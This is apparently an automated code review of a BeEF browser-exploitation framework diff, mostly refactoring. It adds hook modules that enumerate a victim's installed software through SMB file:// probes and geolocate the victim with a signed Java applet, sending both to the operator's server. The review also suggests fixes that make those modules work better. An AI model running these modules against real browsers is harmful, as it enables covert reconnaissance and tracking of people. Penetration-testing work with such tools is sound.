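Review bot: in the `v == BeEF::Core::Constants::Browsers::ALL` block, the `if k == BeEF::Core::Constants::CommandModule::VERIFIED_NOT_WORKING` branch assigns `rating = 1` immediately after `rating = 1`, so it has no effect; set the value that was intended or drop the branch. The hand-written maximum loop at the end can be reduced to `results.max_by { |r| r['rating'] }['const']`. Because the loop compares with `>`, the first of several equally rated entries wins; if tie order matters for the result, say so in a comment. The commented-out `VERIFIED_NOT_WORKING` blocks should be removed or replaced by a TODO that explains them.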

View File

@@ -15,20 +15,20 @@
#
class Hash
# Recursively deep merge two hashes together
# @param [Hash] hash Hash to be merged
# @return [Hash] Combined hash
# @note Duplicate keys are overwritten by the value defined in the hash calling deep_merge (not the parameter hash)
# @note http://snippets.dzone.com/posts/show/4706
def deep_merge(hash)
target = dup
hash.keys.each do |key|
if hash[key].is_a? Hash and self[key].is_a? Hash
target[key] = target[key].deep_merge(hash[key])
next
end
target[key] = hash[key]
end
target
# Recursively deep merge two hashes together
# @param [Hash] hash Hash to be merged
# @return [Hash] Combined hash
# @note Duplicate keys are overwritten by the value defined in the hash calling deep_merge (not the parameter hash)
# @note http://snippets.dzone.com/posts/show/4706
def deep_merge(hash)
target = dup
hash.keys.each do |key|
if hash[key].is_a? Hash and self[key].is_a? Hash
target[key] = target[key].deep_merge(hash[key])
next
end
target[key] = hash[key]
end
target
end
end
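
Review bot: the `@note` on `deep_merge` says duplicate keys are overwritten by the value defined in the hash calling `deep_merge`, but the body does `target[key] = hash[key]`, so for non-Hash values the parameter hash wins. Correct the comment while the method is being touched; anything that merges configuration with it needs to know which side takes precedence.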

View File

@@ -21,7 +21,7 @@ class Module
classes = []
ObjectSpace.each_object(Class) { |k| classes << k if k.included_modules.include?(self) }
classes.reverse.inject([]) do |unique_classes, klass|
classes.reverse.inject([]) do |unique_classes, klass|
unique_classes << klass unless unique_classes.collect { |k| k.to_s }.include?(klass.to_s)
unique_classes
end
@@ -32,26 +32,8 @@ class Module
def included_in_modules
modules = []
ObjectSpace.each_object(Module) { |k| modules << k if k.included_modules.include?(self) }
modules.reverse.inject([]) do |unique_modules, klass|
unique_modules << klass unless unique_modules.collect { |k| k.to_s }.include?(klass.to_s)
unique_modules
end
end
# Returns the modules extended inside the target module
# @return [Array] Array of modules
def extended_modules
(class << self; self end).included_modules
end
# Returns the modules extending the target module
# @return [Array] Array of modules
def extended_in_modules
modules = []
ObjectSpace.each_object(Module) { |k| modules << k if k.extended_modules.include?(self) }
modules.reverse.inject([]) do |unique_modules, klass|
modules.reverse.inject([]) do |unique_modules, klass|
unique_modules << klass unless unique_modules.collect { |k| k.to_s }.include?(klass.to_s)
unique_modules
end

View File

@@ -14,35 +14,35 @@
# limitations under the License.
#
class Object
# Returns true if the object is a Boolean
# @return [Boolean] Whether the object is boolean
def boolean?
self.is_a?(TrueClass) || self.is_a?(FalseClass)
self.is_a?(TrueClass) || self.is_a?(FalseClass)
end
# Returns true if the object is a String
# @return [Boolean] Whether the object is a string
def string?
self.is_a?(String)
end
# Returns true if the object is an Integer
# @return [Boolean] Whether the object is an integer
def integer?
self.is_a?(Integer)
end
# Returns true if the object is a hash
# @return [Boolean] Whether the object is a hash
def hash?
self.is_a?(Hash)
end
# Returns true if the object is a class
# @return [Boolean] Whether the object is a class
def class?
self.is_a?(Class)
end
end

View File

@@ -55,27 +55,27 @@ module DataMapper
def normalized_uri
@normalized_uri ||=
begin
keys = [
:adapter, :user, :password, :host, :port, :path, :fragment,
:scheme, :query, :username, :database ]
query = DataMapper::Ext::Hash.except(@options, keys)
query = nil if query.empty?
begin
keys = [
:adapter, :user, :password, :host, :port, :path, :fragment,
:scheme, :query, :username, :database ]
query = DataMapper::Ext::Hash.except(@options, keys)
query = nil if query.empty?
# Better error message in case port is no Numeric value
port = @options[:port].nil? ? nil : @options[:port].to_int
# Better error message in case port is no Numeric value
port = @options[:port].nil? ? nil : @options[:port].to_int
DataObjects::URI.new({
:scheme => @options[:adapter],
:user => @options[:user] || @options[:username],
:password => @options[:password],
:host => @options[:host],
:port => port,
:path => @options[:path] || @options[:database],
:query => query,
:fragment => @options[:fragment]
}).freeze
end
DataObjects::URI.new({
:scheme => @options[:adapter],
:user => @options[:user] || @options[:username],
:password => @options[:password],
:host => @options[:host],
:port => port,
:path => @options[:path] || @options[:database],
:query => query,
:fragment => @options[:fragment]
}).freeze
end
end
end

View File

@@ -31,10 +31,10 @@ end
# @note This function will only print messages if the debug flag is set to true
# @todo Once the console extension has been merged into the core, remove the extension checks.
def print_debug(s)
config = BeEF::Core::Configuration.instance
if config.get('beef.debug') || (BeEF::Extension.is_loaded('console') && BeEF::Extension::Console.verbose?)
puts Time.now.localtime.strftime("[%k:%M:%S]")+'[>]'.yellow+' '+s.to_s
end
config = BeEF::Core::Configuration.instance
if config.get('beef.debug') || (BeEF::Extension.is_loaded('console') && BeEF::Extension::Console.verbose?)
puts Time.now.localtime.strftime("[%k:%M:%S]")+'[>]'.yellow+' '+s.to_s
end
end
# Function used to print successes to the console
@@ -49,14 +49,14 @@ end
def print_more(s)
time = Time.now.localtime.strftime("[%k:%M:%S]")
lines = s.split("\n")
lines.each_with_index do |line, index|
lines.each_with_index do |line, index|
if ((index+1) == lines.size)
puts "#{time} |_ #{line}"
else
puts "#{time} | #{line}"
end
end
end
end
# Function used to print over the current line

View File

@@ -18,5 +18,5 @@ class String
# @note Use a gem to colorize the console.
# @note http://flori.github.com/term-ansicolor/
include Term::ANSIColor
end

View File

@@ -21,27 +21,25 @@ ZombieTab = function(zombie) {
requester_tab = new ZombieTab_Requester(zombie);
xssrays_tab = new ZombieTab_XssRaysTab(zombie);
//-------------------------------------------
ZombieTab.superclass.constructor.call(this, {
id: zombie.session,
id:"current-browser",
activeTab: 0,
loadMask: {msg:'Loading browser...'},
title: zombie.ip,
title: "Current Browser",
autoScroll: true,
closable: true,
closable: false,
viewConfig: {
forceFit: true,
type: 'fit'
},
items:[main_tab, log_tab, commands_tab, requester_tab, xssrays_tab]
});
};
Ext.extend(ZombieTab, Ext.TabPanel, {
listeners: {
close: function(panel) {
panel.destroy();
}
activate: function(panel) {},
deactivate: function(panel) {},
close: function(panel) {}
}
});

View File

@@ -132,7 +132,7 @@ function get_dynamic_payload_details(payload, zombie) {
generate_form_input_field(Ext.getCmp("payload-panel"), input, null, false, zombie);
});
Ext.getCmp("payload-panel").doLayout();
Ext.getCmp("payload-panel").doLayout();
}
})
}
@@ -145,7 +145,7 @@ function get_dynamic_payload_details(payload, zombie) {
* @param: {Object} the targeted Zombie.
* @param: {Object} the status bar.
*/
function genExisingExploitPanel(panel, command_id, zombie, sb) {
function genExistingExploitPanel(panel, command_id, zombie, sb) {
if(typeof panel != 'object') {
Ext.beef.msg('Bad!', 'Incorrect panel chosen.');
return;
@@ -304,7 +304,7 @@ function genNewExploitPanel(panel, command_module_id, command_module_name, zombi
var xgrid = Ext.getCmp('command-module-grid-zombie-'+zombie.session);
var sb = Ext.getCmp('commands-bbar-zombie-'+zombie.session);
panel.removeAll();
if(command_module_name == 'some special command module') {
//HERE we will develop specific panels for the command modules that require it.
} else {
@@ -327,9 +327,8 @@ function genNewExploitPanel(panel, command_module_id, command_module_name, zombi
}
module = module.command_modules[1];
panel.removeAll();
var form = new Ext.form.FormPanel({
var form = new Ext.form.FormPanel({
url: submiturl,
id: 'form-command-module-zombie-'+zombie.session,
@@ -394,7 +393,7 @@ function genNewExploitPanel(panel, command_module_id, command_module_name, zombi
bodyBorder: false,
height: 200,
hidden: true,
border: false //we can remove the border of the panel
border: false //we can remove the border of the panel
});
Ext.each(module.Data, function(input){
@@ -402,7 +401,6 @@ function genNewExploitPanel(panel, command_module_id, command_module_name, zombi
);
form.add(payload_panel);
panel.add(form);
panel.doLayout();
// hide the load mask after rendering of the config panel is done

View File

@@ -77,7 +77,7 @@ ZombieTab_Commands = function(zombie) {
if(!command_id) return;
genExisingExploitPanel(command_module_config, command_id, zombie, commands_statusbar);
genExistingExploitPanel(command_module_config, command_id, zombie, commands_statusbar);
});
LoadCommandPanelEvent = function(node,keyclick) {
@@ -95,7 +95,7 @@ ZombieTab_Commands = function(zombie) {
nonce: Ext.get ("nonce").dom.value
}
});
genNewExploitPanel(command_module_config, node.id, node.text, zombie, commands_statusbar);
commands_statusbar.showValid('Ready');
}
@@ -139,16 +139,12 @@ ZombieTab_Commands = function(zombie) {
'afterrender' : function() {
},
'selectionchange' : function() {
console.log("selection changed");
},
'activate' : function() {
console.log("activate");
},
'select' : function() {
console.log("select");
},
'keyup' : function() {
console.log("Key up");
},
'render' : function(c) {
c.getEl().on('keyup', function() {
@@ -189,4 +185,8 @@ ZombieTab_Commands = function(zombie) {
var sb = Ext.getCmp('command-module-bbar-zombie-'+zombie.session);
};
Ext.extend(ZombieTab_Commands, Ext.Panel, {});
Ext.extend(ZombieTab_Commands, Ext.Panel, {
listeners: {
close: function(panel) {}
}
});

View File

@@ -102,8 +102,6 @@ ZombieTab_Requester = function(zombie) {
// itemclick: function(item) {
// switch (item.id) {
// case 'do-something':
// console.log("history_panel_context_menu.rowIndex: " + history_panel_context_menu.rowIndex);
// console.log("history_panel_context_menu.dbIndex: " + history_panel_context_menu.dbIndex);
// break;
// }
// }

View File

@@ -113,12 +113,13 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, {
//creates a new hooked browser tab when a hooked browser is clicked
click: function(node, e) {
if(!node.leaf) return;
if(!mainPanel.get(node.attributes.session)) {
mainPanel.remove(mainPanel.getComponent('current-browser'));
if(!mainPanel.getComponent('current-browser')) {
mainPanel.add(new ZombieTab(node.attributes));
}
mainPanel.activate(node.attributes.session);
mainPanel.activate(mainPanel.getComponent('current-browser'));
},
//show the context menu when a HB is right-clicked
contextmenu: function(node, event){
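
Review bot: in the `click` handler, `mainPanel.remove(mainPanel.getComponent('current-browser'))` runs unconditionally, so the `if(!mainPanel.getComponent('current-browser'))` guard that follows should always be true and the tab is rebuilt on every click, including a click on the browser that is already displayed. Either drop the guard, or skip the remove/add when the clicked node is the one currently shown. Also confirm that `remove` tolerates the undefined that `getComponent` returns on the very first click.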

View File

@@ -81,7 +81,6 @@ module BeEF
# add a log entry for the newly hooked browser
BeEF::Core::Logger.instance.register('Zombie', "#{zombie.ip} just joined the horde from the domain: #{log_zombie_domain}:#{log_zombie_port.to_s}", "#{zombie.id}")
# get and store browser name
browser_name = get_param(@data['results'], 'BrowserName')
if BeEF::Filters.is_valid_browsername?(browser_name)
@@ -274,6 +273,10 @@ module BeEF
self.err_msg "Invalid value for hasPersistentCookies returned from the hook browser's initial connection."
end
# log a few info of newly hooked zombie in the console
print_info "New Hooked Browser [ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}], hooked domain [#{log_zombie_domain}:#{log_zombie_port.to_s}]"
# Call autorun modules
autorun = []
BeEF::Core::Configuration.instance.get('beef.module').each { |k, v|
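
Review bot: the `print_info` line writes values to the operator's console that come from the hooked browser's initial connection, as `browser_name` visibly does via `get_param(@data['results'], 'BrowserName')`. The hunk shows a `BeEF::Filters` check for the browser name only; confirm that `browser_version`, `os_name` and `log_zombie_domain` have each passed their filter, or been replaced with a safe default, before this line runs, so that a hooked page cannot place control characters or forged log lines in the terminal. The `.to_s` inside `#{log_zombie_port.to_s}` is redundant.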

View File

@@ -37,13 +37,19 @@ module BeEF
def handle_request socket
request_line = socket.readline
# HTTP method # defaults to GET
method = request_line[/^\w+/]
url = request_line[/^\w+\s+(\S+)/, 1]
# HTTP version # defaults to 1.0
version = request_line[/HTTP\/(1\.\d)\s*$/, 1]
version = "1.0" if version.nil?
# url # host:port/path
url = request_line[/^\w+\s+(\S+)/, 1]
# We're overwriting the URI::Parser UNRESERVED regex to prevent BAD URI errors when sending attack vectors (see tolerant_parser)
tolerant_parser = URI::Parser.new(:UNRESERVED => BeEF::Core::Configuration.instance.get("beef.extension.requester.uri_unreserved_chars"))
uri = tolerant_parser.parse(url)
uri = tolerant_parser.parse(url.to_s)
raw_request = request_line
content_length = 0
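
Review bot: the comment `# HTTP method # defaults to GET` is not backed by code: `method = request_line[/^\w+/]` stays nil when the request line has no leading word, unlike `version`, which gets an explicit `"1.0"` fallback. Add the fallback or drop the comment. `url.to_s` turns a missing URL into an empty string that is then handed to the parser, so the malformed request is only caught further down; rejecting it here with a clear error would be easier to follow. No `rescue` around `tolerant_parser.parse` or `socket.readline` is visible in this hunk.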

View File

@@ -65,16 +65,16 @@ module BeEF
#@note: retrieve HTTP headers values needed later, and the \r\n that indicates the start of the post-data (if any)
req_parts.each_with_index do |value, index|
if value.match(/^Content-Length/)
@content_length = Integer(req_parts[index].split(/: /)[1])
if value.match(/^Content-Length:\s+(\d+)/)
@content_length = Integer(req_parts[index].split(/:\s+/)[1])
end
if value.match(/^Host/)
@host = req_parts[index].split(/: /)[1].split(/:/)[0]
@port = req_parts[index].split(/: /)[1].split(/:/)[1]
@host = req_parts[index].split(/:\s+/)[1].split(/:/)[0]
@port = req_parts[index].split(/:\s+/)[1].split(/:/)[1]
end
if value.eql?("") or value.strip.empty?# this will be the CRLF (before HTTP request body)
if value.eql?("") or value.strip.empty? # this will be the CRLF (before HTTP request body)
@post_data_index = index
end
end
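
Review bot: the Content-Length check is still not tight enough: `/^Content-Length:\s+(\d+)/` is not anchored at the end, so `Content-Length: 12abc` matches, and `Integer(...)` on the re-split value then raises ArgumentError. Anchor the pattern with `\s*$` and convert the captured group rather than splitting the line a second time. The `\s+` also requires at least one space after the colon, and the header name is matched case-sensitively; both are stricter than HTTP. `/^Host/` matches any header whose name merely starts with `Host`, and `split(/:/)` cuts an IPv6 literal at its first colon.
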
@@ -111,7 +111,7 @@ module BeEF
http_request_object = {
'id' => http_db_object.id,
'method' => verb,
'host' => @host.strip,
'host' => @host,
'port' => @port,
'data' => @post_data,
'uri' => uri,
@@ -123,7 +123,7 @@ module BeEF
http_request_object = {
'id' => http_db_object.id,
'method' => verb,
'host' => @host.strip,
'host' => @host,
'port' => @port,
'uri' => uri,
'headers' => headers,

View File

@@ -23,7 +23,7 @@ if RUBY_VERSION < '1.9'
puts "Ruby version " + RUBY_VERSION + " is no longer supported. Please upgrade 1.9 or later."
puts ""
puts "OSX:"
puts "sudo port install ruby19 +nosuffix"
puts "See README"
puts "\n"
exit
end

View File

@@ -0,0 +1,21 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var result = "Disabled or not installed";
if (window.console && (window.console.firebug || window.console.exception)) result = "Enabled";
beef.net.send("<%= @command_url %>", <%= @command_id %>, "firebug="+result);
});

View File

@@ -0,0 +1,26 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
detect_firebug:
enable: true
category: "Browser"
name: "Detect FireBug"
description: "This module checks if the Mozilla Firefox Firebug extension is being use to inspect the current window."
authors: ["bcoles"]
target:
working: ["FF"]
not_working: ["All"]
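
Review bot: typo in `description`: "is being use to inspect" should read "is being used to inspect". `working: ["FF"]` next to `not_working: ["All"]` relies on the specific browser entry outranking `All` in the support-rating code; a one-line comment saying so would help the next module author.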

View File

@@ -0,0 +1,24 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Detect_firebug < BeEF::Core::Command
def post_execute
content = {}
content['firebug'] = @datastore['firebug'] if not @datastore['firebug'].nil?
save content
end
end

View File

@@ -0,0 +1,39 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=sent unhook request");
// remove script tag(s)
try {
var scripts = document.getElementsByTagName("script");
for (var i=0; i<scripts.length; i++) {
if (scripts[i].src.match(/https?:\/\/[^\/]+\/hook\.js/)) {
scripts[i].parentNode.removeChild(scripts[i]);
}
}
} catch (e) { }
// attempt to clean up DOM
try {
delete beef;
delete BEEFHOOK;
beef_init=null;
BeefJS=null;
} catch (e) { }
});
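
Review bot: the script-removal loop walks a live collection forwards: `document.getElementsByTagName("script")` shrinks as soon as `removeChild` runs, so the element that follows each removed hook tag is skipped. Iterate from `scripts.length - 1` down to 0, or copy the collection into an array first. In the cleanup block, `delete beef` and `delete BEEFHOOK` only succeed if those names are deletable properties of `window`; for globals created with `var` or a function declaration the delete fails quietly, and the empty `catch` hides any error, so assigning `null` as is done for `beef_init` and `BeefJS` is the more dependable form. A short comment noting that the result is sent before the cleanup runs, and therefore cannot report whether it worked, would also help.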

View File

@@ -0,0 +1,25 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
unhook:
enable: true
category: "Browser"
name: "Unhook"
description: "This module removes the BeEF hook from the hooked page."
authors: ["bcoles"]
target:
working: ["All"]

View File

@@ -0,0 +1,24 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Unhook < BeEF::Core::Command
def post_execute
content = {}
content["result"] = @datastore["result"] if not @datastore["result"].nil?
save content
end
end

View File

@@ -19,8 +19,7 @@ beef:
enable: true
category: "Exploits"
name: "Safari Launch App"
description: "Launch an application from the victim machine.<br/><br/>See CVE-2011-3230 for more details."
notes: "Safari <= 5.1 on OS X is vulnerable. Original discovery by Aaron Sigel. Also see CVE-2011-3230"
description: "Launch an application from the victim machine.<br/><br/>See CVE-2011-3230 for more details.<br /><br />Safari <= 5.1 on OS X is vulnerable. Original discovery by Aaron Sigel. Also see CVE-2011-3230"
authors: ["antisnatchor"]
target:
user_notify: ["S"]

View File

@@ -22,4 +22,9 @@ beef:
description: "This module attempts to detect Common UNIX Printing System (CUPS) on localhost on the default port 631."
authors: ["bcoles"]
target:
working: ["ALL"]
working:
ALL:
os: ["Linux"]
not_working:
ALL:
os: ["All"]

View File

@@ -22,4 +22,7 @@ beef:
description: "This module attempts to detect Google Desktop running on the default port 4664."
authors: ["bcoles"]
target:
not_working:
ALL:
os: ["iPhone"]
working: ["ALL"]

View File

@@ -19,8 +19,7 @@ beef:
enable: true
category: "Host"
name: "Get Protocol Handlers"
description: "This module attempts to identify protocol handlers present on the hooked browser."
notes: "Only Internet Explorer and Firefox are supported.<br /><br />Firefox users are prompted to launch the application for which the protocol handler is responsible.<br /><br />Firefox users are warned when there is no application assigned to a protocol handler.<br /><br /><br /><br />The possible return values are: unknown, exists, does not exist"
description: "This module attempts to identify protocol handlers present on the hooked browser. Only Internet Explorer and Firefox are supported.<br /><br />Firefox users are prompted to launch the application for which the protocol handler is responsible.<br /><br />Firefox users are warned when there is no application assigned to a protocol handler.<br /><br /><br /><br />The possible return values are: unknown, exists, does not exist."
authors: ["bcoles"]
target:
working: ["IE"]

View File

@@ -0,0 +1,159 @@
//
// detect software
//
beef.execute(function() {
var files = [
"Adobe/Reader 9.0/Reader/Tracker/add_reviewer.gif",
"NetWaiting/Logon.bmp",
"Windows NT/Pinball/table.bmp",
"InterVideo/WinDVD/Skins/WinDVD 5/Audio SRS Subpanel/Audio_SRS_Subpanel_Base_Mask.bmp",
"Java/jre1.6.0_02/lib/images/cursors/invalid32x32.gif",
"Common Files/Roxio Shared/9.0/Tutorial/Graphics/archive.gif",
"Windows Sidebar/Gadgets/Weather.Gadget/images/1px.gif",
"Pinnacle/Shared Files/Pixie/Register/hdr_register_1.gif",
"Adobe/Reader 8.0/Reader/BeyondReader/ENU/Onramp/acrobat.gif",
"eFax Messenger 4.3/Media/ENU/confidential.gif",
"InterActual/InterActual Player/help/images/btm_bckg.gif",
"Intuit/QuickBooks 2007/Components/Help/Updates/bolt.gif",
"Java/jre1.5.0_11/lib/images/cursors/win32_CopyDrop32x32.gif",
"Macromedia/Flash 8/en/First Run/HelpPanel/_sharedassets/check.gif",
"Microsoft Dynamics CRM/Client/res/web/_imgs/configure.gif",
"Microsoft Office/Live Meeting 8/Console/Playback/Engine/img/dropdown-arrow.gif",
"Microsoft Visual Studio 8/Common7/IDE/VBExpress/ProjectTemplatesCache/1033/MovieCollection.zip/Documentation/images/side-vb.gif",
"Mozilla Firefox/res/broken-image.gif",
"Mozilla Thunderbird/res/grabber.gif",
"TechSmith/SnagIt 9/HTML_Content/add-in.gif",
"VMware/VMware Player/help/images/collapse.gif",
"WildPackets/OmniPeek Personal/1033/Html/expert-red-yellow-on.gif",
"FreeMind/accessories/hide.png",
"HP/Digital Imaging/Skins/oov1/bc/img/bc-backLogo.png",
"Movie Maker/Shared/news.png",
"MySQL/MySQL Tools for 5.0/images/grt/db/column.png",
"Safari/Safari.resources/compass.png",
"ThinkVantage Fingerprint Software/rsc/logon.png",
"Trillian/plugins/GoodNews/icons/logo.png",
"Trillian/users/default/cache/account-AIM-offline.png",
"VideoLAN/VLC/http/images/delete.png",
"Virtual Earth 3D/Data/Atmosphere.png",
"Windows Media Connect 2/wmc_bw120.png",
"Analog Devices/SoundMAX/CPApp.ico",
"AT&T/Communication Manager/desktop.ico",
"ATI Technologies/ATI.ACE/branding.ico",
"Canon/ZoomBrowser EX/Program/CIGLibDisplayIcon.ico",
"CDBurnerXP Pro 3/Resources/cdbxp.ico",
"DivX/divxdotcom.ico",
"Fiddler/IE_Toolbar.ico",
"HP/SwfScan/SwfScan.ico",
"iPhone Configuration Utility/Document-Config.ico",
"Microsoft Device Emulator/1.0/emulator.ico",
"MSN/MSNCoreFiles/Install/msnms.ico",
"OpenVPN/openvpn.ico",
"Paros/paros_logo.ico",
"Adobe/Photoshop 6.0/Help/images/banner.jpg",
"iTunes/iTunes.Resources/genre-blues.jpg",
"Source Insight 3/images/SubBack.jpg",
"Canon/CameraWindow/MyCameraFiles/VI_JPG/XMAS22_VI01.JPG",
"Microsoft Office/OFFICE11/REFBAR.ICO",
"Microsoft Office/OFFICE12/REFBAR.ICO",
"Windows Media Player/Network Sharing/wmpnss_color48.jpg",
]
var descriptions = [
"Adobe Reader 9.0",
"WinDVD",
"Windows Pinball",
"Conexant NetWaiting",
"JRE 1.6.0_22",
"Roxio 9.0",
"Windows Weather Gadget",
"Pinnacle",
"Adobe Reader 8.0",
"eFax Manager 4.0",
"Interactual Player",
"Quickbooks",
"JRE 1.5.0_11",
"Flash 8",
"Microsoft CRM",
"Microsoft Live Meeting 8",
"Microsoft Visual Studio 8",
"Mozilla Firefox",
"Mozilla Thunderbird",
"Snagit 9",
"VMware Player",
"Omnipeek Personal",
"Freemind",
"HP Digital Imaging",
"Windows Movie Maker",
"MySQL Tools for 5.0",
"Safari",
"ThinkVantage Fingerprint Software",
"Trillian Plugin GoodNews",
"Trillian",
"VideoLAN VLC",
"Microsoft Virtial Earth 3D",
"Windows Media Connect 2",
"SoundMAX",
"AT&T Communications Manager",
"ATI Technologies ATI.ACE",
"Canon ZoomBrowser",
"CDBurnerXP Pro 3",
"DivX",
"Fiddler",
"HP's SwfScan",
"iPhone Configuration Utility",
"Microsoft Device Emulator",
"MSN",
"OpenVPN",
"Paros",
"Adobe Photoshop 6.0",
"iTunes",
"Source Insight 3",
"Canon CameraWindow",
"Microsoft Office 11",
"Microsoft Office 12",
"Windows Media Player"
]
if (navigator.appName != "Microsoft Internet Explorer") {
result = 'Software detection module only works in IE (so far)';
beef.net.send("<%= @command_url %>", <%= @command_id %>, "detect_software="+result);
// Using IE lets test for smb enum
} else {
var pic1 = new Image();
pic1.src= "file:///\\127.0.0.1/C$/WINDOWS/system32/ntimage.gif";
var pic2 = new Image();
pic2.src= "file:///\\127.0.0.1/C$/Windows/Web/Wallpaper/img1.jpg";
if (pic1.width == 28 && pic2.width == 28) {
result = 'SMB method of detecting software failed';
beef.net.send("<%= @command_url %>", <%= @command_id %>, "detect_software="+result);
// smb enum is working lets look for installed software
} else {
result = '';
var sixtyfourbitvista = 0;
for (var x = 0; x < files.length; x++) {
var pic1 = new Image();
pic1.src= "file:///\\127.0.0.1/C$/Program Files/" + files[x];
if (pic1.width != 28) {
result += descriptions[x];
result += ' and ';
} else {
pic1.src= "file:///\\127.0.0.1/C$/Program Files (x86)/" + files[x];
if (pic1.width != 28) {
result += descriptions[x];
result += ' and ';
sixtyfourbitvista = 1;
}
}
}
beef.net.send("<%= @command_url %>", <%= @command_id %>, "detect_software="+result);
}
}
});
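
Review bot: `files` and `descriptions` are parallel arrays that have drifted apart: index 1 is `NetWaiting/Logon.bmp` but is reported as "WinDVD", index 3 is the WinDVD skin but is reported as "Conexant NetWaiting", and the labels "JRE 1.6.0_22" and "eFax Manager 4.0" sit against paths for `jre1.6.0_02` and `eFax Messenger 4.3`. A single array of path/name pairs would rule this out. The trailing comma after the last `files` entry matters because the module is IE-only: older IE versions count it as an extra element, so the loop runs one more iteration with an undefined path. `result` is assigned without `var`, and `sixtyfourbitvista` is set but never read.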

View File

@@ -0,0 +1,13 @@
# detect software
#
beef:
module:
Detect_software:
enable: true
category: "Host"
name: "Detect Software"
description: "Detects software installed on the host (Internet Explorer only)"
authors: ["mh"]
target:
working: ["IE"]
not_working: ["All"]

View File

@@ -0,0 +1,12 @@
# detect software
#
class Detect_software < BeEF::Core::Command
def post_execute
content = {}
content['detect_software'] = @datastore['detect_software']
save content
end
end

View File

@@ -0,0 +1,30 @@
//
// Copyright 2011 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/getGPSLocation.jar';
var applet_id = '<%= @applet_id %>';
var applet_name = '<%= @applet_name %>';
var output;
beef.dom.attachApplet(applet_id, 'getGPSLocation', 'getGPSLocation' ,
null, applet_archive, null);
output = document.getGPSLocation.getInfo();
if (output) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'location_info='+output.replace(/\n/g,"<br>"));
}
beef.dom.detachApplet('getGPSLocation');
});
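
Review bot: attach and detach disagree on the applet id: `beef.dom.attachApplet(applet_id, ...)` uses the templated `applet_id`, while `beef.dom.detachApplet('getGPSLocation')` uses a literal, and `applet_name` is assigned but never used. Use the same variable in both calls and remove the unused one. `document.getGPSLocation.getInfo()` is called straight after the attach with no wait and no try/catch, so if the applet has not finished loading the command fails without sending anything back. `applet_archive` hard-codes `http://` regardless of the scheme the hook itself was served over.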

View File

@@ -0,0 +1,26 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
get_physical_location:
enable: true
category: "Host"
name: "Get Physical Location"
description: "This module will retrieve geolocation information based on the neighboring wireless access points using commands encapsulated within a signed Java Applet. <br/><br/>The details will include:<br/> <ul><li> - GPS Coordinates details</li><li> - Street Address details</li></ul><br/><br/> If the victim machine has a firewall that monitors outgoing connections (Zonealaram, LittleSnitch, ..), calls to Google maps will be alerted."
authors: ["keith_lee @keith55 http://milo2012.wordpress.com", "antisnatchor"]
target:
working: ["IE"]
user_notify: ["C", "S", "O", "FF"]

Binary file not shown.

Binary file not shown.

View File

@@ -0,0 +1,244 @@
import java.io.*;
import java.util.*;
import java.net.*;
